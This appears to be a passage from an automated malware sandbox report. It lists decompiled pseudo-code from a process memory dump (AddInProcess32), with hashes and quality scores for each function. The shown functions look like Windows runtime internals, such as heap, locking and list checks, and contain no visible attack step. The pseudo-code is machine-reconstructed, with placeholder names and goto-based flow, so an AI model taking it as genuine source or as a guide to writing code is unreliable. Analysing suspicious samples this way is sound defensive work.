                              				intOrPtr _t36;
                              				char* _t38;
                              				signed char* _t42;
                              
                              				_push(__ecx);
                              				_t31 = __edx;
                              				_v8 = __ecx;
                              				_t19 = E01877D50();
                              				_t38 = 0x7ffe0384;
                              				if(_t19 != 0) {
                              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              				} else {
                              					_t22 = 0x7ffe0384;
                              				}
                              				_t42 = 0x7ffe0385;
                              				if( *_t22 != 0) {
                              					if(E01877D50() == 0) {
                              						_t24 = 0x7ffe0385;
                              					} else {
                              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              					}
                              					if(( *_t24 & 0x00000010) != 0) {
                              						goto L17;
                              					} else {
                              						goto L3;
                              					}
                              				} else {
                              					L3:
                              					_t27 = E01877D50();
                              					if(_t27 != 0) {
                              						_t27 =  *[fs:0x30];
                              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                              					}
                              					if( *_t38 != 0) {
                              						_t27 =  *[fs:0x30];
                              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                              							goto L5;
                              						}
                              						_t27 = E01877D50();
                              						if(_t27 != 0) {
                              							_t27 =  *[fs:0x30];
                              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                              						}
                              						if(( *_t42 & 0x00000020) != 0) {
                              							L17:
                              							_t25 = _v8;
                              							_t36 = 0;
                              							if(_t25 != 0) {
                              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                              							}
                              							_t27 = E018D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                              						}
                              						goto L5;
                              					} else {
                              						L5:
                              						return _t27;
                              					}
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                              • Instruction ID: 9d5fbde8b67b1df254b4dfb8a2726243beeda3c28eb42044baafd5ad30a63881
                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                              • Instruction Fuzzy Hash: BE21D4326016859FE716DB6CC948F257BE9EF44B54F0904A4ED04CB792E774DE40C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E0188FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				intOrPtr _v8;
                              				void* _t19;
                              				intOrPtr _t29;
                              				intOrPtr _t32;
                              				intOrPtr _t35;
                              				intOrPtr _t37;
                              				intOrPtr* _t40;
                              
                              				_t35 = __edx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t37 = 0;
                              				_v8 = __edx;
                              				_t29 = __ecx;
                              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                              					L3:
                              					_t19 = _a4 - 4;
                              					if(_t19 != 0) {
                              						if(_t19 != 1) {
                              							L7:
                              							return _t37;
                              						}
                              						if(_t35 == 0) {
                              							L11:
                              							_t37 = 0xc000000d;
                              							goto L7;
                              						}
                              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                              							_t35 = _v8;
                              						}
                              						 *((intOrPtr*)(_t40 + 4)) = _t35;
                              						goto L7;
                              					}
                              					if(_t29 == 0) {
                              						goto L11;
                              					}
                              					_t32 =  *_t40;
                              					if(_t32 != 0) {
                              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                              						E018676E2( *_t40);
                              					}
                              					 *_t40 = _t29;
                              					goto L7;
                              				}
                              				_t40 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                              				if(_t40 == 0) {
                              					_t37 = 0xc0000017;
                              					goto L7;
                              				}
                              				_t35 = _v8;
                              				 *_t40 = 0;
                              				 *((intOrPtr*)(_t40 + 4)) = 0;
                              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                              				goto L3;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                              • Instruction ID: b2419a8466ad2bafdb9f376ae8e97667ab2507b4bf6ce6784018f896715da2c7
                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                              • Instruction Fuzzy Hash: 30217972600A45DBD731DF0DC540A66FBE5EB94B10F24816EEA49CB611D730EE00CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E0188B390(void* __ecx, intOrPtr _a4) {
                              				signed int _v8;
                              				signed char _t12;
                              				signed int _t16;
                              				signed int _t21;
                              				void* _t28;
                              				signed int _t30;
                              				signed int _t36;
                              				signed int _t41;
                              
                              				_push(__ecx);
                              				_t41 = _a4 + 0xffffffb8;
                              				E01872280(_t12, 0x1948608);
                              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                              				asm("sbb edi, edi");
                              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                              				_v8 = _t36;
                              				asm("lock cmpxchg [ebx], ecx");
                              				_t30 = 1;
                              				if(1 != 1) {
                              					while(1) {
                              						_t21 = _t30 & 0x00000006;
                              						_t16 = _t30;
                              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                              						asm("lock cmpxchg [edi], esi");
                              						if(_t16 == _t30) {
                              							break;
                              						}
                              						_t30 = _t16;
                              					}
                              					_t36 = _v8;
                              					if(_t21 == 2) {
                              						_t16 = E018900C2(0x1948608, 0, _t28);
                              					}
                              				}
                              				if(_t36 != 0) {
                              					_t16 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                              				}
                              				return _t16;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26d851f3303a862abb667b72e221283235c0ff3a9e8aaa69c3683023263dafae
                              • Instruction ID: ef797124f786d44c748ea3a9f13219572bacd95605a3a3bc3f45dd8c4915bb9d
                              • Opcode Fuzzy Hash: 26d851f3303a862abb667b72e221283235c0ff3a9e8aaa69c3683023263dafae
                              • Instruction Fuzzy Hash: 66116B333112149BCB19DA688D81A2BB3D7EBC5770B28012DDD1AC7380D931DE02C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E01859240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                              				intOrPtr _t33;
                              				intOrPtr _t37;
                              				intOrPtr _t41;
                              				intOrPtr* _t46;
                              				void* _t48;
                              				intOrPtr _t50;
                              				intOrPtr* _t60;
                              				void* _t61;
                              				intOrPtr _t62;
                              				intOrPtr _t65;
                              				void* _t66;
                              				void* _t68;
                              
                              				_push(0xc);
                              				_push(0x192f708);
                              				E018AD08C(__ebx, __edi, __esi);
                              				_t65 = __ecx;
                              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                              				if( *(__ecx + 0x24) != 0) {
                              					_push( *(__ecx + 0x24));
                              					E018995D0();
                              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                              				}
                              				L6();
                              				L6();
                              				_push( *((intOrPtr*)(_t65 + 0x28)));
                              				E018995D0();
                              				_t33 =  *0x19484c4; // 0x0
                              				L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                              				_t37 =  *0x19484c4; // 0x0
                              				L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                              				_t41 =  *0x19484c4; // 0x0
                              				E01872280(L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x19486b4);
                              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                              				_t46 = _t65 + 0xe8;
                              				_t62 =  *_t46;
                              				_t60 =  *((intOrPtr*)(_t46 + 4));
                              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                              					_t61 = 3;
                              					asm("int 0x29");
                              					_push(_t65);
                              					_t66 = _t61;
                              					_t23 = _t66 + 0x14; // 0x8df8084c
                              					_push( *_t23);
                              					E018995D0();
                              					_t24 = _t66 + 0x10; // 0x89e04d8b
                              					_push( *_t24);
                              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                              					_t48 = E018995D0();
                              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                              					return _t48;
                              				} else {
                              					 *_t60 = _t62;
                              					 *((intOrPtr*)(_t62 + 4)) = _t60;
                              					 *(_t68 - 4) = 0xfffffffe;
                              					E01859325();
                              					_t50 =  *0x19484c4; // 0x0
                              					return E018AD0D1(L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 0caa90c53cfcee2620d8bf4d9b09062dc2f1addfc7ef3a27e5f1d6635bbd81bf
                              • Instruction ID: f090b9bc2076bec85ad1e9322d60b31992e232f3aeb43b4a8d992957507db532
                              • Opcode Fuzzy Hash: 0caa90c53cfcee2620d8bf4d9b09062dc2f1addfc7ef3a27e5f1d6635bbd81bf
                              • Instruction Fuzzy Hash: 51212532441A01DFCB62EF6CCA44F5AB7B9FF28709F15456CE149C6AA2CB34EA41CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E018E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                              				intOrPtr* _t18;
                              				intOrPtr _t24;
                              				intOrPtr* _t27;
                              				intOrPtr* _t30;
                              				intOrPtr* _t31;
                              				intOrPtr _t33;
                              				intOrPtr* _t34;
                              				intOrPtr* _t35;
                              				void* _t37;
                              				void* _t38;
                              				void* _t39;
                              				void* _t43;
                              
                              				_t39 = __eflags;
                              				_t35 = __edi;
                              				_push(8);
                              				_push(0x19308d0);
                              				E018AD08C(__ebx, __edi, __esi);
                              				_t37 = __ecx;
                              				E018E41E8(__ebx, __edi, __ecx, _t39);
                              				E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                              				_t18 = _t37 + 8;
                              				_t33 =  *_t18;
                              				_t27 =  *((intOrPtr*)(_t18 + 4));
                              				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                              					L8:
                              					_push(3);
                              					asm("int 0x29");
                              				} else {
                              					 *_t27 = _t33;
                              					 *((intOrPtr*)(_t33 + 4)) = _t27;
                              					_t35 = 0x19487e4;
                              					_t18 =  *0x19487e0; // 0x0
                              					while(_t18 != 0) {
                              						_t43 = _t18 -  *0x1945cd0; // 0xffffffff
                              						if(_t43 >= 0) {
                              							_t31 =  *0x19487e4; // 0x0
                              							_t18 =  *_t31;
                              							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                              								goto L8;
                              							} else {
                              								 *0x19487e4 = _t18;
                              								 *((intOrPtr*)(_t18 + 4)) = _t35;
                              								L01857055(_t31 + 0xfffffff8);
                              								_t24 =  *0x19487e0; // 0x0
                              								_t18 = _t24 - 1;
                              								 *0x19487e0 = _t18;
                              								continue;
                              							}
                              						}
                              						goto L9;
                              					}
                              				}
                              				L9:
                              				__eflags =  *0x1945cd0;
                              				if( *0x1945cd0 <= 0) {
                              					L01857055(_t37);
                              				} else {
                              					_t30 = _t37 + 8;
                              					_t34 =  *0x19487e8; // 0x0
                              					__eflags =  *_t34 - _t35;
                              					if( *_t34 != _t35) {
                              						goto L8;
                              					} else {
                              						 *_t30 = _t35;
                              						 *((intOrPtr*)(_t30 + 4)) = _t34;
                              						 *_t34 = _t30;
                              						 *0x19487e8 = _t30;
                              						 *0x19487e0 = _t18 + 1;
                              					}
                              				}
                              				 *(_t38 - 4) = 0xfffffffe;
                              				return E018AD0D1(L018E4320());
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4e0be7cb54e946410c4221e803b0326c4f9c4cc0a42ae7014abdf22cfc35fc53
                              • Instruction ID: 7e5a8ef5ee099ef4ceb3e07b5b2cf929ca824f2195868f10f14dda23e92ee03b
                              • Opcode Fuzzy Hash: 4e0be7cb54e946410c4221e803b0326c4f9c4cc0a42ae7014abdf22cfc35fc53
                              • Instruction Fuzzy Hash: 14219D78904701CFCB25EFA8D014E24BBF1FB86315B55826EC10DCBA99DB32D691CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 25%
                              			E01882397(intOrPtr _a4) {
                              				void* __ebx;
                              				void* __ecx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t11;
                              				void* _t19;
                              				void* _t25;
                              				void* _t26;
                              				intOrPtr _t27;
                              				void* _t28;
                              				void* _t29;
                              
                              				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                              				if( *0x194848c != 0) {
                              					L0187FAD0(0x1948610);
                              					if( *0x194848c == 0) {
                              						E0187FA00(0x1948610, _t19, _t27, 0x1948610);
                              						goto L1;
                              					} else {
                              						_push(0);
                              						_push(_a4);
                              						_t26 = 4;
                              						_t29 = E01882581(0x1948610, 0x18350a0, _t26, _t27, _t28);
                              						E0187FA00(0x1948610, 0x18350a0, _t27, 0x1948610);
                              					}
                              				} else {
                              					L1:
                              					_t11 =  *0x1948614; // 0x0
                              					if(_t11 == 0) {
                              						_t11 = E01894886(0x1831088, 1, 0x1948614);
                              					}
                              					_push(0);
                              					_push(_a4);
                              					_t25 = 4;
                              					_t29 = E01882581(0x1948610, (_t11 << 4) + 0x1835070, _t25, _t27, _t28);
                              				}
                              				if(_t29 != 0) {
                              					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                              					 *((char*)(_t29 + 0x40)) = 0;
                              				}
                              				return _t29;
                              			}
















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c020ec5e9e1022a2645ab0c3a6e91fff493f97b17dcb493033bbcd3a663048df
                              • Instruction ID: 138819e8ad43d8688e234673a311455ee6de762ba9f701be80fc4e6007f6f343
                              • Opcode Fuzzy Hash: c020ec5e9e1022a2645ab0c3a6e91fff493f97b17dcb493033bbcd3a663048df
                              • Instruction Fuzzy Hash: 27114E7174430167E770BA6E9C90F1AF6DAFBA0B50F18402AF706D7291D5B0EB05C795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E018D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                              				signed short* _v8;
                              				unsigned int _v12;
                              				intOrPtr _v16;
                              				signed int _t22;
                              				signed char _t23;
                              				short _t32;
                              				void* _t38;
                              				char* _t40;
                              
                              				_v12 = __edx;
                              				_t29 = 0;
                              				_v8 = __ecx;
                              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                              				_t38 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                              				if(_t38 != 0) {
                              					_t40 = _a4;
                              					 *_t40 = 1;
                              					E0189F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                              					_t22 = _v12 >> 1;
                              					_t32 = 0x2e;
                              					 *((short*)(_t38 + _t22 * 2)) = _t32;
                              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                              					_t23 = E0188D268(_t38, 1);
                              					asm("sbb al, al");
                              					 *_t40 =  ~_t23 + 1;
                              					L018777F0(_v16, 0, _t38);
                              				} else {
                              					 *_a4 = 0;
                              					_t29 = 0xc0000017;
                              				}
                              				return _t29;
                              			}












                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                              • Instruction ID: aa0cae1fa42587fc3398c05137dacb138d78f4090d1318b050188395c26abf5d
                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                              • Instruction Fuzzy Hash: 8811E572504208BFCB059F5CE8808BEBBB9EF95314F10806AF944C7351DA319E55D7A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E018937F5(void* __ecx, intOrPtr* __edx) {
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t6;
                              				intOrPtr _t13;
                              				intOrPtr* _t20;
                              				intOrPtr* _t27;
                              				void* _t28;
                              				intOrPtr* _t29;
                              
                              				_t27 = __edx;
                              				_t28 = __ecx;
                              				if(__edx == 0) {
                              					E01872280(_t6, 0x1948550);
                              				}
                              				_t29 = E0189387E(_t28);
                              				if(_t29 == 0) {
                              					L6:
                              					if(_t27 == 0) {
                              						E0186FFB0(0x1948550, _t27, 0x1948550);
                              					}
                              					if(_t29 == 0) {
                              						return 0xc0000225;
                              					} else {
                              						if(_t27 != 0) {
                              							goto L14;
                              						}
                              						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                              						goto L11;
                              					}
                              				} else {
                              					_t13 =  *_t29;
                              					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                              						L13:
                              						_push(3);
                              						asm("int 0x29");
                              						L14:
                              						 *_t27 = _t29;
                              						L11:
                              						return 0;
                              					}
                              					_t20 =  *((intOrPtr*)(_t29 + 4));
                              					if( *_t20 != _t29) {
                              						goto L13;
                              					}
                              					 *_t20 = _t13;
                              					 *((intOrPtr*)(_t13 + 4)) = _t20;
                              					asm("btr eax, ecx");
                              					goto L6;
                              				}
                              			}












                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cea70f299a8a7ba0fd30369ffbb7896a755c4fac607a024724bdbde7df92b48
                              • Instruction ID: b0b1afdafbba0a81fe7ee969fc1a08e7fd2fe111ae1bef48f49997dfb939c978
                              • Opcode Fuzzy Hash: 8cea70f299a8a7ba0fd30369ffbb7896a755c4fac607a024724bdbde7df92b48
                              • Instruction Fuzzy Hash: 0401D6B29016119BCB378B6D9940E26BBE6FF85B547194069ED5AEF315DB30CB01C7C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0188002D() {
                              				void* _t11;
                              				char* _t14;
                              				signed char* _t16;
                              				char* _t27;
                              				signed char* _t29;
                              
                              				_t11 = E01877D50();
                              				_t27 = 0x7ffe0384;
                              				if(_t11 != 0) {
                              					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              				} else {
                              					_t14 = 0x7ffe0384;
                              				}
                              				_t29 = 0x7ffe0385;
                              				if( *_t14 != 0) {
                              					if(E01877D50() == 0) {
                              						_t16 = 0x7ffe0385;
                              					} else {
                              						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              					}
                              					if(( *_t16 & 0x00000040) != 0) {
                              						goto L18;
                              					} else {
                              						goto L3;
                              					}
                              				} else {
                              					L3:
                              					if(E01877D50() != 0) {
                              						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					}
                              					if( *_t27 != 0) {
                              						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                              							goto L5;
                              						}
                              						if(E01877D50() != 0) {
                              							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              						}
                              						if(( *_t29 & 0x00000020) == 0) {
                              							goto L5;
                              						}
                              						L18:
                              						return 1;
                              					} else {
                              						L5:
                              						return 0;
                              					}
                              				}
                              			}









                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                              • Instruction ID: 7850df7d0ebdbdbc9c0249d426c7712397fdbe8db652e4afa7c97acdaf27af4b
                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                              • Instruction Fuzzy Hash: B511C8326066C18FE723D7ACC568B357BD4AF41B58F0900A4ED14C7693E739DB82C261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0186766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                              				char _v8;
                              				void* _t22;
                              				void* _t24;
                              				intOrPtr _t29;
                              				intOrPtr* _t30;
                              				void* _t42;
                              				intOrPtr _t47;
                              
                              				_push(__ecx);
                              				_t36 =  &_v8;
                              				if(E0188F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                              					L10:
                              					_t22 = 0;
                              				} else {
                              					_t24 = _v8 + __ecx;
                              					_t42 = _t24;
                              					if(_t24 < __ecx) {
                              						goto L10;
                              					} else {
                              						if(E0188F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                              							goto L10;
                              						} else {
                              							_t29 = _v8 + _t42;
                              							if(_t29 < _t42) {
                              								goto L10;
                              							} else {
                              								_t47 = _t29;
                              								_t30 = _a16;
                              								if(_t30 != 0) {
                              									 *_t30 = _t47;
                              								}
                              								if(_t47 == 0) {
                              									goto L10;
                              								} else {
                              									_t22 = L01874620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t22;
                              			}











                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                              • Instruction ID: c13a0702e694a779a13952ad9991e85647d0faa6e8162b2f9f8a92f7f1ee06b9
                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                              • Instruction Fuzzy Hash: 3301A232701119ABD720EE6ECC41E5BBBADEB84B64F280534BA09CB250DE30DE01C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E01859080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                              				intOrPtr* _t51;
                              				intOrPtr _t59;
                              				signed int _t64;
                              				signed int _t67;
                              				signed int* _t71;
                              				signed int _t74;
                              				signed int _t77;
                              				signed int _t82;
                              				intOrPtr* _t84;
                              				void* _t85;
                              				intOrPtr* _t87;
                              				void* _t94;
                              				signed int _t95;
                              				intOrPtr* _t97;
                              				signed int _t99;
                              				signed int _t102;
                              				void* _t104;
                              
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t97 = __ecx;
                              				_t102 =  *(__ecx + 0x14);
                              				if((_t102 & 0x02ffffff) == 0x2000000) {
                              					_t102 = _t102 | 0x000007d0;
                              				}
                              				_t48 =  *[fs:0x30];
                              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                              					_t102 = _t102 & 0xff000000;
                              				}
                              				_t80 = 0x19485ec;
                              				E01872280(_t48, 0x19485ec);
                              				_t51 =  *_t97 + 8;
                              				if( *_t51 != 0) {
                              					L6:
                              					return E0186FFB0(_t80, _t97, _t80);
                              				} else {
                              					 *(_t97 + 0x14) = _t102;
                              					_t84 =  *0x194538c; // 0x77996828
                              					if( *_t84 != 0x1945388) {
                              						_t85 = 3;
                              						asm("int 0x29");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						_push(0x2c);
                              						_push(0x192f6e8);
                              						E018AD0E8(0x19485ec, _t97, _t102);
                              						 *((char*)(_t104 - 0x1d)) = 0;
                              						_t99 =  *(_t104 + 8);
                              						__eflags = _t99;
                              						if(_t99 == 0) {
                              							L13:
                              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                              							if(__eflags == 0) {
                              								E019288F5(_t80, _t85, 0x1945388, _t99, _t102, __eflags);
                              							}
                              						} else {
                              							__eflags = _t99 -  *0x19486c0; // 0x12e07b0
                              							if(__eflags == 0) {
                              								goto L13;
                              							} else {
                              								__eflags = _t99 -  *0x19486b8; // 0x0
                              								if(__eflags == 0) {
                              									goto L13;
                              								} else {
                              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                              									__eflags =  *((char*)(_t59 + 0x28));
                              									if( *((char*)(_t59 + 0x28)) == 0) {
                              										E01872280(_t99 + 0xe0, _t99 + 0xe0);
